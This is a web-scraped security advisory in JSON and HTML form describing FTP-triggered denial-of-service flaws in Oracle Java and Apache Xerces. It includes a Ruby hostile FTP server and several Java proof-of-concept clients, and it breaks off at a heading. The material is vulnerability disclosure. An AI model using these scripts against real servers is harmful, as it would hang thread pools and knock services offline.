{"id":9010,"date":"2017-08-30T14:19:11","date_gmt":"2017-08-30T22:19:11","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2783\/"},"modified":"2017-08-30T14:19:11","modified_gmt":"2017-08-30T22:19:11","slug":"news-2783","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2783\/","title":{"rendered":"SSD Advisory \u2013 Oracle Java and Apache Xerces PDF\/Docx Server Side DoS"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 30 Aug 2017 19:11:43 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3271\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3271');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in Oracle Java JDK\/JRE (1.8.0.131 and previous versions) packages and Apache Xerces (2.11.0)<\/p>\n<p>The vulnerabilities are: <\/p>\n<ul>\n<li>Oracle JDK\/JRE Concurrency-Related Denial of Service<\/li>\n<li>java.net.URLConnection (with no setConnectTimeout) Concurrency-Related Denial of Service<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Oracle acknowledged receiving the report, and has assigned it a tracking number: S0876966. 
We have no further information on patch availability or a workaround.<\/p>\n<p><span id=\"more-3271\"><\/span><\/p>\n<p><u><strong>Vulnerabilities Details<\/strong><\/u><br \/> These two vulnerabilities can be triggered to cause a Denial of Service against a server under the following conditions:<\/p>\n<ul>\n<li>An attacker can pass the target a URL parameter that points to an FTP server the attacker controls<\/li>\n<li>The target server uses the vulnerable component(s) to fetch the resource specified by the attacker<\/li>\n<li>The target server does not prevent fetching of FTP URI resources<\/li>\n<\/ul>\n<p>In both vulnerabilities, the attack sequence is the following:<\/p>\n<ol>\n<li>The attacker forces the vulnerable target server to parse an FTP URL that points to an attacker-controlled FTP server<\/li>\n<li>The target server fetches the FTP resource provided by the attacker<\/li>\n<li>The attacker&#8217;s FTP server abruptly exits, leaving the Java process on the target server with two internal threads in an infinite waiting status<\/li>\n<li>If the Java process is single-threaded, it cannot process any further client requests, reaching a Denial of Service condition with only one request from the attacker<\/li>\n<li>If the Java process is multi-threaded, the same technique can be used to reach a Denial of Service condition on all available threads by issuing one request for each available thread<\/li>\n<\/ol>\n<p>The attacker-controlled FTP server has to \u201cabruptly\u201d exit when the Java client performs a RETR FTP command. 
This behavior is not properly handled and causes a thread concurrency Denial of Service.<\/p>\n<p>For example:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f08d809041410\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> require 
'socket'\n\nftp_server = TCPServer.new 21\n\nThread.start do\n  loop do\n    Thread.start(ftp_server.accept) do |ftp_client|\n      puts \"FTP. New client connected\"\n      ftp_client.puts(\"220 ftp-server\")\n      counter = 0\n      loop {\n        req = ftp_client.gets()\n        break if req.nil?\n        puts \"&lt; \"+req\n\n        if req.include? \"USER\"\n          ftp_client.puts(\"331 password\")\n        else\n          ftp_client.puts(\"230 Waiting data\")\n          counter = counter + 1\n          if counter == 6\n            abort\n          end\n        end\n      }\n      puts \"Aborted...\"\n    end\n  end\nend\n\nloop do\n  sleep(50000)\nend<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0024 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1.jpg\" data-slb-active=\"1\" data-slb-asset=\"673454470\" data-slb-internal=\"0\" data-slb-group=\"3271\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" class=\"alignnone size-medium wp-image-3272\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1-300x198.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-1.jpg 306w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>When triggered, the DoS will result in a CLOSE_WAIT status on the connection between the target server and the FTP server (192.168.234.134), leaving the Java process thread stuck.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"2016881245\" data-slb-internal=\"0\" data-slb-group=\"3271\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2-300x11.jpg\" 
alt=\"\" width=\"300\" height=\"11\" class=\"alignnone size-medium wp-image-3273\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2-300x11.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/Oracel-2.jpg 606w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Oracle JDK\/JRE Concurrency-Related Denial of Service<\/strong><br \/> The vulnerable functions are:<\/p>\n<ul>\n<li>java.io.InputStream<\/li>\n<li>javax.xml.ws.Service<\/li>\n<li>javax.xml.validation.Schema<\/li>\n<li>javax.xml.JAXBContext<\/li>\n<li>java.net.JarURLConnection &#8211; setConnectTimeout and setReadTimeout are ignored<\/li>\n<li>javax.imageio.ImageIO<\/li>\n<li>javax.swing.ImageIcon<\/li>\n<li>javax.swing.text.html.StyleSheet<\/li>\n<\/ul>\n<p><strong>java.io.InputStream Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f097609467949\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import java.io.InputStream;\nimport java.net.URL;\n\npublic class RandomAccess {\n public static void main(String[] args) {\n  try {\n   \/\/url = new URL (\"ftp:\/\/maliciousftp:2121\/test.xml\");\n   URL url = new URL(\"ftp:\/\/maliciousftp:2121\/test.xml\");\n   InputStream inputStream = url.openStream();\n   inputStream.read();\n   \/\/urlc.setReadTimeout(5000);\n   \/\/urlc.setConnectTimeout(5000); \/\/ &lt;- this fixes the bug\n  } catch (Exception e) {\n   e.printStackTrace();\n  }\n }\n}<\/textarea><\/div>\n
<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p><strong>javax.xml.ws.Service Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n
<div id=\"crayon-59a739de8f09a169914474\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import java.net.MalformedURLException;\nimport java.net.URL;\n\nimport javax.xml.namespace.QName;\nimport javax.xml.ws.Service;\n\npublic class CreateService {\n public static void main(String[] args) {\n  String wsdlURL = \"ftp:\/\/maliciousftp:2121\/test?wsdl\";\n  String namespace = \"http:\/\/foo.bar.com\/webservice\";\n  String serviceName = \"SomeService\";\n  QName serviceQN = new QName(namespace, serviceName);\n\n  try {\n   Service service = Service.create(new URL(wsdlURL), serviceQN);\n  } catch (MalformedURLException e) {\n   e.printStackTrace();\n  }\n }\n\n}<\/textarea><\/div>\n
<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0023 seconds] -->  <\/p>\n<p><strong>javax.xml.validation.Schema Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n
<div id=\"crayon-59a739de8f09d900447033\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px 
!important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import java.net.MalformedURLException;\nimport java.net.URL;\n\nimport javax.xml.validation.Schema;\nimport javax.xml.validation.SchemaFactory;\n\nimport org.xml.sax.SAXException;\n\npublic class NSchema {\n public static void main(String[] args) {\n  SchemaFactory schemaFactory =\n  SchemaFactory.newInstance(\"http:\/\/www.w3.org\/2001\/XMLSchema\");\n  URL url;\n  try {\n   url = new URL(\"ftp:\/\/maliciousftp:2121\/schema\");\n   try {\n    Schema schemaGrammar = schemaFactory.newSchema(url);\n   } catch (SAXException e) {\n    e.printStackTrace();\n   }\n  } catch (MalformedURLException e) {\n   e.printStackTrace();\n  }\n }\n}<\/textarea><\/div>\n
<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-16\">16<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-59a739de8f09d900447033-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f09d900447033-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f09d900447033-25\">25<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">validation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Schema<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">javax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">validation<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SchemaFactory<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">org<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SAXException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-9\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">NSchema<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">SchemaFactory <\/span><span class=\"crayon-v\">schemaFactory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SchemaFactory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newInstance<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/www.w3.org\/2001\/XMLSchema&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-15\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/schema&#8221;<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Schema <\/span><span class=\"crayon-v\">schemaGrammar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">schemaFactory<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">newSchema<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">SAXException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f09d900447033-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f09d900447033-25\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0026 seconds] -->  <\/p>\n<p><strong>javax.xml.JAXBContext Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0a0419148849\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; 
line-height: 18px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">import java.net.MalformedURLException;\nimport java.net.URL;\n\nimport javax.xml.bind.JAXBContext;\nimport javax.xml.bind.JAXBException;\nimport javax.xml.bind.Unmarshaller;\n\npublic class UnMarsh {\n    public static void main(String[] args) {\n        JAXBContext jaxbContext = null;\n        try {\n            jaxbContext = JAXBContext.newInstance();\n        } catch (JAXBException e) {\n            e.printStackTrace();\n        }\n        URL url = null;\n        try {\n            url = new URL(\"ftp:\/\/maliciousftp:2121\/test\");\n        } catch (MalformedURLException e) {\n            e.printStackTrace();\n        }\n        Unmarshaller jaxbUnmarshaller = null;\n        try {\n            jaxbUnmarshaller = jaxbContext.createUnmarshaller();\n        } catch (JAXBException e) {\n            e.printStackTrace();\n        }\n        try {\n            \/\/ unmarshal(url) fetches the document over FTP; per the advisory, the thread\n            \/\/ waits indefinitely if the FTP server exits during RETR\n            Object test = jaxbUnmarshaller.unmarshal(url);\n        } catch (JAXBException e) {\n            e.printStackTrace();\n        }\n    }\n}<\/textarea><\/div>\n<\/div>\n<p><strong>java.net.JarURLConnection Proof of Concept<\/strong><\/p>\n<div id=\"crayon-59a739de8f0a3686072524\" class=\"crayon-syntax 